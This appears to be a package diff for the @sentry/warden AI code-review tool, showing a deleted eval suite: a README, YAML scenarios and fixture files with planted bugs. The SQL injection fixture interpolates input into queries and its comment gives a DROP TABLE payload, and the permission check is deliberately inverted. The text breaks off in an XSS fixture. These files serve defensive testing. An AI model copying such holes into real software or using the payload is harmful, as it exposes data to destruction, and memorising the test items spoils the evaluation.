@sentry/warden 0.12.0 → 0.14.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/agents.lock +66 -0
- package/dist/cli/args.d.ts +17 -9
- package/dist/cli/args.d.ts.map +1 -1
- package/dist/cli/args.js +51 -2
- package/dist/cli/args.js.map +1 -1
- package/dist/cli/commands/add.js +1 -1
- package/dist/cli/commands/add.js.map +1 -1
- package/dist/cli/commands/init.d.ts +0 -3
- package/dist/cli/commands/init.d.ts.map +1 -1
- package/dist/cli/commands/init.js +219 -24
- package/dist/cli/commands/init.js.map +1 -1
- package/dist/cli/commands/logs.d.ts +19 -0
- package/dist/cli/commands/logs.d.ts.map +1 -0
- package/dist/cli/commands/logs.js +419 -0
- package/dist/cli/commands/logs.js.map +1 -0
- package/dist/cli/commands/sync.d.ts.map +1 -1
- package/dist/cli/commands/sync.js +16 -4
- package/dist/cli/commands/sync.js.map +1 -1
- package/dist/cli/fix.d.ts.map +1 -1
- package/dist/cli/fix.js +6 -1
- package/dist/cli/fix.js.map +1 -1
- package/dist/cli/log-cleanup.d.ts +6 -5
- package/dist/cli/log-cleanup.d.ts.map +1 -1
- package/dist/cli/log-cleanup.js +11 -10
- package/dist/cli/log-cleanup.js.map +1 -1
- package/dist/cli/main.d.ts.map +1 -1
- package/dist/cli/main.js +87 -29
- package/dist/cli/main.js.map +1 -1
- package/dist/cli/output/formatters.d.ts +8 -2
- package/dist/cli/output/formatters.d.ts.map +1 -1
- package/dist/cli/output/formatters.js +40 -19
- package/dist/cli/output/formatters.js.map +1 -1
- package/dist/cli/output/index.d.ts +2 -2
- package/dist/cli/output/index.d.ts.map +1 -1
- package/dist/cli/output/index.js +2 -2
- package/dist/cli/output/index.js.map +1 -1
- package/dist/cli/output/ink-runner.js +1 -1
- package/dist/cli/output/ink-runner.js.map +1 -1
- package/dist/cli/output/jsonl.d.ts +51 -14
- package/dist/cli/output/jsonl.d.ts.map +1 -1
- package/dist/cli/output/jsonl.js +140 -7
- package/dist/cli/output/jsonl.js.map +1 -1
- package/dist/cli/output/reporter.d.ts +4 -0
- package/dist/cli/output/reporter.d.ts.map +1 -1
- package/dist/cli/output/reporter.js +14 -0
- package/dist/cli/output/reporter.js.map +1 -1
- package/dist/cli/output/tasks.d.ts +3 -1
- package/dist/cli/output/tasks.d.ts.map +1 -1
- package/dist/cli/output/tasks.js +7 -4
- package/dist/cli/output/tasks.js.map +1 -1
- package/dist/cli/terminal.d.ts +4 -3
- package/dist/cli/terminal.d.ts.map +1 -1
- package/dist/cli/terminal.js +22 -11
- package/dist/cli/terminal.js.map +1 -1
- package/dist/config/loader.d.ts +3 -1
- package/dist/config/loader.d.ts.map +1 -1
- package/dist/config/loader.js +2 -0
- package/dist/config/loader.js.map +1 -1
- package/dist/config/schema.d.ts +84 -70
- package/dist/config/schema.d.ts.map +1 -1
- package/dist/config/schema.js +7 -1
- package/dist/config/schema.js.map +1 -1
- package/dist/evals/types.d.ts +9 -15
- package/dist/evals/types.d.ts.map +1 -1
- package/dist/index.d.ts +2 -2
- package/dist/index.d.ts.map +1 -1
- package/dist/index.js +2 -0
- package/dist/index.js.map +1 -1
- package/dist/output/dedup.d.ts +14 -10
- package/dist/output/dedup.d.ts.map +1 -1
- package/dist/output/dedup.js +39 -17
- package/dist/output/dedup.js.map +1 -1
- package/dist/output/github-checks.d.ts +5 -3
- package/dist/output/github-checks.d.ts.map +1 -1
- package/dist/output/github-checks.js +14 -16
- package/dist/output/github-checks.js.map +1 -1
- package/dist/output/issue-renderer.js +1 -1
- package/dist/output/issue-renderer.js.map +1 -1
- package/dist/output/renderer.d.ts.map +1 -1
- package/dist/output/renderer.js +11 -7
- package/dist/output/renderer.js.map +1 -1
- package/dist/output/types.d.ts +3 -1
- package/dist/output/types.d.ts.map +1 -1
- package/dist/sdk/analyze.d.ts.map +1 -1
- package/dist/sdk/analyze.js +12 -5
- package/dist/sdk/analyze.js.map +1 -1
- package/dist/sdk/auth.d.ts +16 -0
- package/dist/sdk/auth.d.ts.map +1 -0
- package/dist/sdk/auth.js +37 -0
- package/dist/sdk/auth.js.map +1 -0
- package/dist/sdk/errors.d.ts +5 -0
- package/dist/sdk/errors.d.ts.map +1 -1
- package/dist/sdk/errors.js +20 -0
- package/dist/sdk/errors.js.map +1 -1
- package/dist/sdk/prompt.d.ts.map +1 -1
- package/dist/sdk/prompt.js +3 -1
- package/dist/sdk/prompt.js.map +1 -1
- package/dist/sdk/runner.d.ts +2 -1
- package/dist/sdk/runner.d.ts.map +1 -1
- package/dist/sdk/runner.js +3 -1
- package/dist/sdk/runner.js.map +1 -1
- package/dist/skills/remote.d.ts +4 -0
- package/dist/skills/remote.d.ts.map +1 -1
- package/dist/skills/remote.js +47 -27
- package/dist/skills/remote.js.map +1 -1
- package/dist/types/index.d.ts +42 -22
- package/dist/types/index.d.ts.map +1 -1
- package/dist/types/index.js +45 -7
- package/dist/types/index.js.map +1 -1
- package/package.json +1 -1
- package/{plugins/warden/skills → skills}/warden/SKILL.md +2 -4
- package/{plugins/warden/skills → skills}/warden/references/cli-reference.md +7 -9
- package/{plugins/warden/skills → skills}/warden/references/config-schema.md +5 -7
- package/{plugins/warden/skills → skills}/warden/references/configuration.md +10 -8
- package/{plugins/warden/skills → skills}/warden/references/creating-skills.md +6 -6
- package/skills/warden-sweep/SKILL.md +407 -0
- package/skills/warden-sweep/scripts/_utils.py +37 -0
- package/skills/warden-sweep/scripts/extract_findings.py +219 -0
- package/skills/warden-sweep/scripts/find_reviewers.py +115 -0
- package/skills/warden-sweep/scripts/generate_report.py +271 -0
- package/skills/warden-sweep/scripts/index_prs.py +187 -0
- package/skills/warden-sweep/scripts/organize.py +315 -0
- package/skills/warden-sweep/scripts/scan.py +632 -0
- package/.claude-plugin/marketplace.json +0 -20
- package/.mcp.json +0 -8
- package/agents.toml +0 -7
- package/conductor.json +0 -8
- package/evals/README.md +0 -154
- package/evals/bug-detection.yaml +0 -56
- package/evals/fixtures/ignores-style-issues/utils.ts +0 -48
- package/evals/fixtures/missing-await/cache.ts +0 -45
- package/evals/fixtures/null-property-access/handler.ts +0 -36
- package/evals/fixtures/off-by-one/paginator.ts +0 -38
- package/evals/fixtures/sql-injection/api.ts +0 -59
- package/evals/fixtures/stale-closure/counter.tsx +0 -33
- package/evals/fixtures/wrong-comparison/validator.ts +0 -52
- package/evals/fixtures/xss-reflected/server.ts +0 -55
- package/evals/precision.yaml +0 -15
- package/evals/security-scanning.yaml +0 -24
- package/evals/skills/bug-detection.md +0 -33
- package/evals/skills/precision.md +0 -18
- package/evals/skills/security-scanning.md +0 -32
- package/plugins/.claude-plugin/marketplace.json +0 -14
- package/plugins/warden/.claude-plugin/plugin.json +0 -7
- package/scripts/update-pricing.ts +0 -88
package/evals/README.md
DELETED
|
@@ -1,154 +0,0 @@
|
|
|
1
|
-
# Warden Evals
|
|
2
|
-
|
|
3
|
-
End-to-end behavioral evaluations for the Warden pipeline. These evals verify
|
|
4
|
-
that Warden correctly runs skills, invokes the agent, extracts findings, and
|
|
5
|
-
produces the expected behavioral outcomes on known code.
|
|
6
|
-
|
|
7
|
-
## Philosophy
|
|
8
|
-
|
|
9
|
-
Evals are not unit tests or A/B comparisons. They answer one question:
|
|
10
|
-
|
|
11
|
-
> **Does the Warden pipeline behave correctly when given known inputs?**
|
|
12
|
-
|
|
13
|
-
Each eval provides code with a known issue, runs the full Warden agent pipeline
|
|
14
|
-
(skill loading, prompt construction, SDK invocation, finding extraction), and
|
|
15
|
-
uses an LLM judge to verify the output matches behavioral expectations.
|
|
16
|
-
|
|
17
|
-
Evals test **Warden's behavior**, not individual skills. Skills are used as
|
|
18
|
-
test vehicles to exercise the pipeline.
|
|
19
|
-
|
|
20
|
-
The only thing mocked is the GitHub event payload. Everything else runs for
|
|
21
|
-
real.
|
|
22
|
-
|
|
23
|
-
## YAML Format
|
|
24
|
-
|
|
25
|
-
Evals are defined in YAML files at the top level of `evals/`. Each file
|
|
26
|
-
describes a category of behaviors with a shared test skill and a list of
|
|
27
|
-
scenarios. No custom code per eval. Adding a new eval means adding an entry
|
|
28
|
-
to a YAML file and a fixture file.
|
|
29
|
-
|
|
30
|
-
```yaml
|
|
31
|
-
skill: skills/bug-detection.md
|
|
32
|
-
|
|
33
|
-
evals:
|
|
34
|
-
- name: null-property-access
|
|
35
|
-
given: code that accesses properties on an array .find() result without null checking
|
|
36
|
-
files:
|
|
37
|
-
- fixtures/null-property-access/handler.ts
|
|
38
|
-
should_find:
|
|
39
|
-
- finding: accessing .name on a potentially undefined user object from Array.find()
|
|
40
|
-
severity: high
|
|
41
|
-
should_not_find:
|
|
42
|
-
- style, formatting, or naming issues
|
|
43
|
-
- the lack of try/catch around the fetch call
|
|
44
|
-
```
|
|
45
|
-
|
|
46
|
-
This reads as:
|
|
47
|
-
|
|
48
|
-
> **Given** code that accesses properties on an array `.find()` result without
|
|
49
|
-
> null checking, Warden **should find** a null access bug and **should not
|
|
50
|
-
> find** style issues.
|
|
51
|
-
|
|
52
|
-
## Eval Structure
|
|
53
|
-
|
|
54
|
-
```
|
|
55
|
-
evals/
|
|
56
|
-
├── README.md
|
|
57
|
-
├── bug-detection.yaml # Category: finding logic bugs
|
|
58
|
-
├── security-scanning.yaml # Category: finding security vulnerabilities
|
|
59
|
-
├── precision.yaml # Category: avoiding false positives
|
|
60
|
-
├── skills/ # Test skills (vehicles for exercising pipeline)
|
|
61
|
-
│ ├── bug-detection.md
|
|
62
|
-
│ ├── security-scanning.md
|
|
63
|
-
│ └── precision.md
|
|
64
|
-
└── fixtures/ # Source code with known issues
|
|
65
|
-
├── null-property-access/
|
|
66
|
-
│ └── handler.ts
|
|
67
|
-
├── off-by-one/
|
|
68
|
-
│ └── paginator.ts
|
|
69
|
-
├── missing-await/
|
|
70
|
-
│ └── cache.ts
|
|
71
|
-
├── wrong-comparison/
|
|
72
|
-
│ └── validator.ts
|
|
73
|
-
├── stale-closure/
|
|
74
|
-
│ └── counter.tsx
|
|
75
|
-
├── sql-injection/
|
|
76
|
-
│ └── api.ts
|
|
77
|
-
├── xss-reflected/
|
|
78
|
-
│ └── server.ts
|
|
79
|
-
└── ignores-style-issues/
|
|
80
|
-
└── utils.ts
|
|
81
|
-
```
|
|
82
|
-
|
|
83
|
-
## YAML Schema
|
|
84
|
-
|
|
85
|
-
### File-level fields
|
|
86
|
-
|
|
87
|
-
| Field | Required | Description |
|
|
88
|
-
|-------|----------|-------------|
|
|
89
|
-
| `skill` | Yes | Path to test skill, relative to `evals/` |
|
|
90
|
-
| `model` | No | Default model for all evals (default: `claude-sonnet-4-6`) |
|
|
91
|
-
| `evals` | Yes | List of eval scenarios (at least one) |
|
|
92
|
-
|
|
93
|
-
### Per-eval fields
|
|
94
|
-
|
|
95
|
-
| Field | Required | Description |
|
|
96
|
-
|-------|----------|-------------|
|
|
97
|
-
| `name` | Yes | Scenario name (used in test output) |
|
|
98
|
-
| `given` | Yes | What code/situation the eval sets up (BDD "given") |
|
|
99
|
-
| `files` | Yes | Fixture files, relative to `evals/` |
|
|
100
|
-
| `model` | No | Model override for this scenario |
|
|
101
|
-
| `should_find` | Yes | What the pipeline should detect (at least one) |
|
|
102
|
-
| `should_find[].finding` | Yes | Natural language description for the LLM judge |
|
|
103
|
-
| `should_find[].severity` | No | Expected severity (hint, not strict) |
|
|
104
|
-
| `should_find[].required` | No | If true (default), eval fails when not found |
|
|
105
|
-
| `should_not_find` | No | Things the pipeline should NOT report (precision) |
|
|
106
|
-
|
|
107
|
-
## Running Evals
|
|
108
|
-
|
|
109
|
-
```bash
|
|
110
|
-
# Run all evals (requires ANTHROPIC_API_KEY)
|
|
111
|
-
pnpm test:evals
|
|
112
|
-
|
|
113
|
-
# Run evals for a specific category
|
|
114
|
-
pnpm test:evals -- --grep "bug-detection"
|
|
115
|
-
|
|
116
|
-
# Run a single eval
|
|
117
|
-
pnpm test:evals -- --grep "null-property-access"
|
|
118
|
-
```
|
|
119
|
-
|
|
120
|
-
Evals make real API calls. They run skills on `claude-sonnet-4-6` by
|
|
121
|
-
default.
|
|
122
|
-
|
|
123
|
-
## Adding a New Eval
|
|
124
|
-
|
|
125
|
-
1. Pick an existing YAML file or create a new `evals/<category>.yaml`
|
|
126
|
-
2. Add a scenario entry under the `evals:` key
|
|
127
|
-
3. Create a fixture file under `evals/fixtures/<scenario>/`
|
|
128
|
-
4. Run `pnpm test:evals` to verify
|
|
129
|
-
|
|
130
|
-
If a new category needs a different test skill, add it to `evals/skills/`.
|
|
131
|
-
|
|
132
|
-
### Guidelines
|
|
133
|
-
|
|
134
|
-
- **One bug per eval.** Each scenario tests one specific behavior.
|
|
135
|
-
- **Make bugs realistic.** Code should look like something a human wrote.
|
|
136
|
-
- **Write precise `should_find`.** "null access on user.name from Array.find()"
|
|
137
|
-
is better than "finds a bug."
|
|
138
|
-
- **Include `should_not_find`.** If the code has issues the skill should ignore,
|
|
139
|
-
call them out.
|
|
140
|
-
- **Keep fixtures small.** 20-80 lines. The agent analyzes hunks, not novels.
|
|
141
|
-
- **No custom code.** Every eval is just YAML + fixture files.
|
|
142
|
-
|
|
143
|
-
## How It Works
|
|
144
|
-
|
|
145
|
-
1. **Discovery**: Scan `evals/` for `.yaml` files
|
|
146
|
-
2. **Loading**: Parse YAML, validate with Zod, resolve paths
|
|
147
|
-
3. **Git repo**: Create a temp repo with fixture files committed on an `eval`
|
|
148
|
-
branch (empty `main` as base), so the agent has a real repo to explore
|
|
149
|
-
4. **Context**: Build `EventContext` from real `git diff main...eval`
|
|
150
|
-
5. **Execution**: Run the skill via `runSkill()` with the real SDK pipeline;
|
|
151
|
-
the agent operates in the temp repo with Read/Grep tools
|
|
152
|
-
6. **Judgment**: An LLM judge (Sonnet) evaluates findings against assertions
|
|
153
|
-
7. **Verdict**: Pass if all required `should_find` are met and no
|
|
154
|
-
`should_not_find` are violated
|
package/evals/bug-detection.yaml
DELETED
|
@@ -1,56 +0,0 @@
|
|
|
1
|
-
skill: skills/bug-detection.md
|
|
2
|
-
|
|
3
|
-
evals:
|
|
4
|
-
- name: null-property-access
|
|
5
|
-
given: code that accesses properties on an array .find() result without null checking
|
|
6
|
-
files:
|
|
7
|
-
- fixtures/null-property-access/handler.ts
|
|
8
|
-
should_find:
|
|
9
|
-
- finding: accessing .name and .profile.avatar on a potentially undefined user object from Array.find()
|
|
10
|
-
severity: high
|
|
11
|
-
should_not_find:
|
|
12
|
-
- style, formatting, or naming issues
|
|
13
|
-
- the lack of try/catch around the fetch call
|
|
14
|
-
|
|
15
|
-
- name: off-by-one
|
|
16
|
-
given: pagination logic that uses Math.floor instead of Math.ceil, skipping the last page
|
|
17
|
-
files:
|
|
18
|
-
- fixtures/off-by-one/paginator.ts
|
|
19
|
-
should_find:
|
|
20
|
-
- finding: off-by-one error in page count calculation that loses the last page when totalItems is not evenly divisible by pageSize
|
|
21
|
-
severity: medium
|
|
22
|
-
should_not_find:
|
|
23
|
-
- use of any[] type
|
|
24
|
-
- missing error handling
|
|
25
|
-
|
|
26
|
-
- name: missing-await
|
|
27
|
-
given: async cache lookup missing await, causing a Promise object to be used as a truthy value
|
|
28
|
-
files:
|
|
29
|
-
- fixtures/missing-await/cache.ts
|
|
30
|
-
should_find:
|
|
31
|
-
- finding: missing await on loadFromCache() call, so cached is always a truthy Promise and the function never actually fetches fresh data
|
|
32
|
-
severity: high
|
|
33
|
-
should_not_find:
|
|
34
|
-
- console.log statements
|
|
35
|
-
- missing return type annotations
|
|
36
|
-
|
|
37
|
-
- name: wrong-comparison
|
|
38
|
-
given: permission check using <= instead of >=, inverting the access control logic
|
|
39
|
-
files:
|
|
40
|
-
- fixtures/wrong-comparison/validator.ts
|
|
41
|
-
should_find:
|
|
42
|
-
- finding: comparison operator is <= instead of >=, granting access to lower-privilege users while denying higher-privilege users
|
|
43
|
-
severity: high
|
|
44
|
-
should_not_find:
|
|
45
|
-
- hardcoded role strings
|
|
46
|
-
- suggestion to use an enum for roles
|
|
47
|
-
|
|
48
|
-
- name: stale-closure
|
|
49
|
-
given: React useEffect with setInterval that captures count in a stale closure
|
|
50
|
-
files:
|
|
51
|
-
- fixtures/stale-closure/counter.tsx
|
|
52
|
-
should_find:
|
|
53
|
-
- finding: "stale closure: setInterval callback captures initial count value and never sees updates, so the counter always sets the same value"
|
|
54
|
-
severity: high
|
|
55
|
-
should_not_find:
|
|
56
|
-
- TypeScript type annotation issues
|
|
@@ -1,48 +0,0 @@
|
|
|
1
|
-
// This code is functionally correct but has style issues.
|
|
2
|
-
// A precision-focused eval: the skill should NOT report any of these as bugs.
|
|
3
|
-
|
|
4
|
-
// Inconsistent naming convention (camelCase vs snake_case)
|
|
5
|
-
export function calculate_total(items: number[]): number {
|
|
6
|
-
let runningTotal = 0;
|
|
7
|
-
for (let i = 0; i < items.length; i++) {
|
|
8
|
-
runningTotal = runningTotal + items[i]!;
|
|
9
|
-
}
|
|
10
|
-
return runningTotal;
|
|
11
|
-
}
|
|
12
|
-
|
|
13
|
-
// Verbose conditional (could be simplified but is correct)
|
|
14
|
-
export function isEligible(age: number, hasConsent: boolean): boolean {
|
|
15
|
-
if (age >= 18) {
|
|
16
|
-
if (hasConsent === true) {
|
|
17
|
-
return true;
|
|
18
|
-
} else {
|
|
19
|
-
return false;
|
|
20
|
-
}
|
|
21
|
-
} else {
|
|
22
|
-
return false;
|
|
23
|
-
}
|
|
24
|
-
}
|
|
25
|
-
|
|
26
|
-
// Missing JSDoc, long parameter list, but functionally correct
|
|
27
|
-
export function formatAddress(
|
|
28
|
-
street: string,
|
|
29
|
-
city: string,
|
|
30
|
-
state: string,
|
|
31
|
-
zip: string,
|
|
32
|
-
country: string
|
|
33
|
-
): string {
|
|
34
|
-
const parts = [street, city, state, zip, country];
|
|
35
|
-
return parts.filter((p) => p.length > 0).join(', ');
|
|
36
|
-
}
|
|
37
|
-
|
|
38
|
-
// Magic numbers but correct behavior
|
|
39
|
-
export function calculateDiscount(price: number, quantity: number): number {
|
|
40
|
-
if (quantity >= 100) {
|
|
41
|
-
return price * 0.8;
|
|
42
|
-
} else if (quantity >= 50) {
|
|
43
|
-
return price * 0.9;
|
|
44
|
-
} else if (quantity >= 10) {
|
|
45
|
-
return price * 0.95;
|
|
46
|
-
}
|
|
47
|
-
return price;
|
|
48
|
-
}
|
|
@@ -1,45 +0,0 @@
|
|
|
1
|
-
interface CacheEntry {
|
|
2
|
-
key: string;
|
|
3
|
-
value: string;
|
|
4
|
-
expiresAt: number;
|
|
5
|
-
}
|
|
6
|
-
|
|
7
|
-
const store = new Map<string, CacheEntry>();
|
|
8
|
-
|
|
9
|
-
async function saveToCache(key: string, value: string, ttlMs: number): Promise<void> {
|
|
10
|
-
// Simulate async storage (e.g., Redis, database)
|
|
11
|
-
await new Promise((resolve) => setTimeout(resolve, 1));
|
|
12
|
-
store.set(key, {
|
|
13
|
-
key,
|
|
14
|
-
value,
|
|
15
|
-
expiresAt: Date.now() + ttlMs,
|
|
16
|
-
});
|
|
17
|
-
}
|
|
18
|
-
|
|
19
|
-
async function loadFromCache(key: string): Promise<string | null> {
|
|
20
|
-
await new Promise((resolve) => setTimeout(resolve, 1));
|
|
21
|
-
const entry = store.get(key);
|
|
22
|
-
if (!entry) return null;
|
|
23
|
-
if (Date.now() > entry.expiresAt) {
|
|
24
|
-
store.delete(key);
|
|
25
|
-
return null;
|
|
26
|
-
}
|
|
27
|
-
return entry.value;
|
|
28
|
-
}
|
|
29
|
-
|
|
30
|
-
export async function getOrFetchData(key: string, fetchFn: () => Promise<string>): Promise<string> {
|
|
31
|
-
// Bug: missing await on loadFromCache. The result `cached` will be a
|
|
32
|
-
// Promise, which is truthy, so the function always returns a Promise
|
|
33
|
-
// object (as a string) instead of the actual cached value.
|
|
34
|
-
const cached = loadFromCache(key);
|
|
35
|
-
|
|
36
|
-
if (cached) {
|
|
37
|
-
console.log('Cache hit:', key);
|
|
38
|
-
return cached as unknown as string;
|
|
39
|
-
}
|
|
40
|
-
|
|
41
|
-
console.log('Cache miss:', key);
|
|
42
|
-
const fresh = await fetchFn();
|
|
43
|
-
await saveToCache(key, fresh, 60_000);
|
|
44
|
-
return fresh;
|
|
45
|
-
}
|
|
@@ -1,36 +0,0 @@
|
|
|
1
|
-
interface User {
|
|
2
|
-
id: string;
|
|
3
|
-
name: string;
|
|
4
|
-
email: string;
|
|
5
|
-
profile: {
|
|
6
|
-
avatar: string;
|
|
7
|
-
bio: string;
|
|
8
|
-
};
|
|
9
|
-
}
|
|
10
|
-
|
|
11
|
-
interface ApiResponse {
|
|
12
|
-
users: User[];
|
|
13
|
-
total: number;
|
|
14
|
-
}
|
|
15
|
-
|
|
16
|
-
async function fetchUsers(endpoint: string): Promise<ApiResponse> {
|
|
17
|
-
const response = await fetch(endpoint);
|
|
18
|
-
return response.json() as Promise<ApiResponse>;
|
|
19
|
-
}
|
|
20
|
-
|
|
21
|
-
export async function getUserDisplayName(userId: string): Promise<string> {
|
|
22
|
-
const data = await fetchUsers(`/api/users?id=${userId}`);
|
|
23
|
-
const user = data.users.find((u) => u.id === userId);
|
|
24
|
-
|
|
25
|
-
// Bug: user could be undefined if not found in the array,
|
|
26
|
-
// but we access .name without checking
|
|
27
|
-
const displayName = user.name;
|
|
28
|
-
const avatarUrl = user.profile.avatar;
|
|
29
|
-
|
|
30
|
-
return `${displayName} (${avatarUrl})`;
|
|
31
|
-
}
|
|
32
|
-
|
|
33
|
-
export async function getTeamMembers(teamId: string): Promise<string[]> {
|
|
34
|
-
const data = await fetchUsers(`/api/teams/${teamId}/members`);
|
|
35
|
-
return data.users.map((u) => u.name);
|
|
36
|
-
}
|
|
@@ -1,38 +0,0 @@
|
|
|
1
|
-
export interface PaginatedResult<T> {
|
|
2
|
-
items: T[];
|
|
3
|
-
page: number;
|
|
4
|
-
totalItems: number;
|
|
5
|
-
pageSize: number;
|
|
6
|
-
}
|
|
7
|
-
|
|
8
|
-
/**
|
|
9
|
-
* Fetch all pages of results from a paginated API endpoint.
|
|
10
|
-
* Collects items from every page and returns them as a flat array.
|
|
11
|
-
*/
|
|
12
|
-
export async function fetchAllPages<T>(
|
|
13
|
-
fetchPage: (page: number) => Promise<PaginatedResult<T>>
|
|
14
|
-
): Promise<T[]> {
|
|
15
|
-
const firstPage = await fetchPage(1);
|
|
16
|
-
const allItems: T[] = [...firstPage.items];
|
|
17
|
-
|
|
18
|
-
// Bug: Math.floor loses the last page when totalItems is not evenly
|
|
19
|
-
// divisible by pageSize. E.g., 25 items / 10 per page = 2.5, floored
|
|
20
|
-
// to 2, so page 3 (items 21-25) is never fetched.
|
|
21
|
-
const totalPages = Math.floor(firstPage.totalItems / firstPage.pageSize);
|
|
22
|
-
|
|
23
|
-
for (let page = 2; page <= totalPages; page++) {
|
|
24
|
-
const result = await fetchPage(page);
|
|
25
|
-
allItems.push(...result.items);
|
|
26
|
-
}
|
|
27
|
-
|
|
28
|
-
return allItems;
|
|
29
|
-
}
|
|
30
|
-
|
|
31
|
-
/**
|
|
32
|
-
* Get a specific page range of results.
|
|
33
|
-
*/
|
|
34
|
-
export function getPageRange(totalItems: number, pageSize: number, currentPage: number): { start: number; end: number } {
|
|
35
|
-
const start = (currentPage - 1) * pageSize;
|
|
36
|
-
const end = Math.min(start + pageSize, totalItems);
|
|
37
|
-
return { start, end };
|
|
38
|
-
}
|
|
@@ -1,59 +0,0 @@
|
|
|
1
|
-
interface DbConnection {
|
|
2
|
-
query(sql: string): Promise<Record<string, unknown>[]>;
|
|
3
|
-
}
|
|
4
|
-
|
|
5
|
-
function getConnection(): DbConnection {
|
|
6
|
-
// In production this returns a real DB connection
|
|
7
|
-
return {
|
|
8
|
-
query: async (sql: string) => {
|
|
9
|
-
console.log('Executing:', sql);
|
|
10
|
-
return [];
|
|
11
|
-
},
|
|
12
|
-
};
|
|
13
|
-
}
|
|
14
|
-
|
|
15
|
-
interface SearchParams {
|
|
16
|
-
name?: string;
|
|
17
|
-
email?: string;
|
|
18
|
-
role?: string;
|
|
19
|
-
}
|
|
20
|
-
|
|
21
|
-
/**
|
|
22
|
-
* Search for users matching the given criteria.
|
|
23
|
-
* Builds a dynamic WHERE clause from the search parameters.
|
|
24
|
-
*/
|
|
25
|
-
export async function searchUsers(params: SearchParams): Promise<Record<string, unknown>[]> {
|
|
26
|
-
const db = getConnection();
|
|
27
|
-
const conditions: string[] = [];
|
|
28
|
-
|
|
29
|
-
if (params.name) {
|
|
30
|
-
// Bug: Direct string interpolation of user input into SQL query.
|
|
31
|
-
// An attacker can pass name = "'; DROP TABLE users; --" to execute
|
|
32
|
-
// arbitrary SQL.
|
|
33
|
-
conditions.push(`name = '${params.name}'`);
|
|
34
|
-
}
|
|
35
|
-
if (params.email) {
|
|
36
|
-
conditions.push(`email = '${params.email}'`);
|
|
37
|
-
}
|
|
38
|
-
if (params.role) {
|
|
39
|
-
conditions.push(`role = '${params.role}'`);
|
|
40
|
-
}
|
|
41
|
-
|
|
42
|
-
const whereClause = conditions.length > 0
|
|
43
|
-
? `WHERE ${conditions.join(' AND ')}`
|
|
44
|
-
: '';
|
|
45
|
-
|
|
46
|
-
const sql = `SELECT id, name, email, role FROM users ${whereClause}`;
|
|
47
|
-
return db.query(sql);
|
|
48
|
-
}
|
|
49
|
-
|
|
50
|
-
/**
|
|
51
|
-
* Get a user by their ID (this one is safe - uses parameterized approach).
|
|
52
|
-
*/
|
|
53
|
-
export async function getUserById(id: number): Promise<Record<string, unknown> | null> {
|
|
54
|
-
const db = getConnection();
|
|
55
|
-
// This is safe because we validate the type
|
|
56
|
-
if (!Number.isInteger(id) || id <= 0) return null;
|
|
57
|
-
const results = await db.query(`SELECT * FROM users WHERE id = ${id}`);
|
|
58
|
-
return results[0] ?? null;
|
|
59
|
-
}
|
|
@@ -1,33 +0,0 @@
|
|
|
1
|
-
import { useState, useEffect } from 'react';
|
|
2
|
-
|
|
3
|
-
interface CounterProps {
|
|
4
|
-
initialValue: number;
|
|
5
|
-
step: number;
|
|
6
|
-
intervalMs: number;
|
|
7
|
-
}
|
|
8
|
-
|
|
9
|
-
/**
|
|
10
|
-
* An auto-incrementing counter that ticks at a given interval.
|
|
11
|
-
*/
|
|
12
|
-
export function AutoCounter({ initialValue, step, intervalMs }: CounterProps) {
|
|
13
|
-
const [count, setCount] = useState(initialValue);
|
|
14
|
-
|
|
15
|
-
useEffect(() => {
|
|
16
|
-
// Bug: This closure captures `count` once at mount time.
|
|
17
|
-
// Every tick reads the same stale `count` value and sets
|
|
18
|
-
// count to initialValue + step, over and over. The counter
|
|
19
|
-
// never actually increments past the first tick.
|
|
20
|
-
const id = setInterval(() => {
|
|
21
|
-
setCount(count + step);
|
|
22
|
-
}, intervalMs);
|
|
23
|
-
|
|
24
|
-
return () => clearInterval(id);
|
|
25
|
-
// eslint-disable-next-line react-hooks/exhaustive-deps
|
|
26
|
-
}, []);
|
|
27
|
-
|
|
28
|
-
return (
|
|
29
|
-
<div>
|
|
30
|
-
<span data-testid="count">{count}</span>
|
|
31
|
-
</div>
|
|
32
|
-
);
|
|
33
|
-
}
|
|
@@ -1,52 +0,0 @@
|
|
|
1
|
-
interface Permission {
|
|
2
|
-
resource: string;
|
|
3
|
-
action: 'read' | 'write' | 'delete';
|
|
4
|
-
role: string;
|
|
5
|
-
}
|
|
6
|
-
|
|
7
|
-
const ROLE_HIERARCHY: Record<string, number> = {
|
|
8
|
-
viewer: 0,
|
|
9
|
-
editor: 1,
|
|
10
|
-
admin: 2,
|
|
11
|
-
superadmin: 3,
|
|
12
|
-
};
|
|
13
|
-
|
|
14
|
-
/**
|
|
15
|
-
* Check if a user's role has sufficient permissions for an action.
|
|
16
|
-
* Returns true if the user is allowed to perform the action.
|
|
17
|
-
*/
|
|
18
|
-
export function hasPermission(userRole: string, requiredRole: string): boolean {
|
|
19
|
-
const userLevel = ROLE_HIERARCHY[userRole] ?? 0;
|
|
20
|
-
const requiredLevel = ROLE_HIERARCHY[requiredRole] ?? 0;
|
|
21
|
-
|
|
22
|
-
// Bug: should be >= but uses <=, so only users with LOWER privilege
|
|
23
|
-
// than required are granted access (e.g., a viewer can perform admin
|
|
24
|
-
// actions, but an admin cannot).
|
|
25
|
-
return userLevel <= requiredLevel;
|
|
26
|
-
}
|
|
27
|
-
|
|
28
|
-
/**
|
|
29
|
-
* Filter a list of permissions to only those a user can perform.
|
|
30
|
-
*/
|
|
31
|
-
export function filterAllowedActions(
|
|
32
|
-
userRole: string,
|
|
33
|
-
permissions: Permission[]
|
|
34
|
-
): Permission[] {
|
|
35
|
-
return permissions.filter((p) => hasPermission(userRole, p.role));
|
|
36
|
-
}
|
|
37
|
-
|
|
38
|
-
/**
|
|
39
|
-
* Validate that a user can perform a specific action on a resource.
|
|
40
|
-
*/
|
|
41
|
-
export function validateAccess(
|
|
42
|
-
userRole: string,
|
|
43
|
-
resource: string,
|
|
44
|
-
action: string,
|
|
45
|
-
permissions: Permission[]
|
|
46
|
-
): boolean {
|
|
47
|
-
const matching = permissions.find(
|
|
48
|
-
(p) => p.resource === resource && p.action === action
|
|
49
|
-
);
|
|
50
|
-
if (!matching) return false;
|
|
51
|
-
return hasPermission(userRole, matching.role);
|
|
52
|
-
}
|
|
@@ -1,55 +0,0 @@
|
|
|
1
|
-
/**
|
|
2
|
-
* Simple HTTP request handler for a search page.
|
|
3
|
-
* Renders search results with the query term displayed back to the user.
|
|
4
|
-
*/
|
|
5
|
-
export function handleSearchRequest(url: string): string {
|
|
6
|
-
const parsed = new URL(url, 'http://localhost:3000');
|
|
7
|
-
const query = parsed.searchParams.get('q') ?? '';
|
|
8
|
-
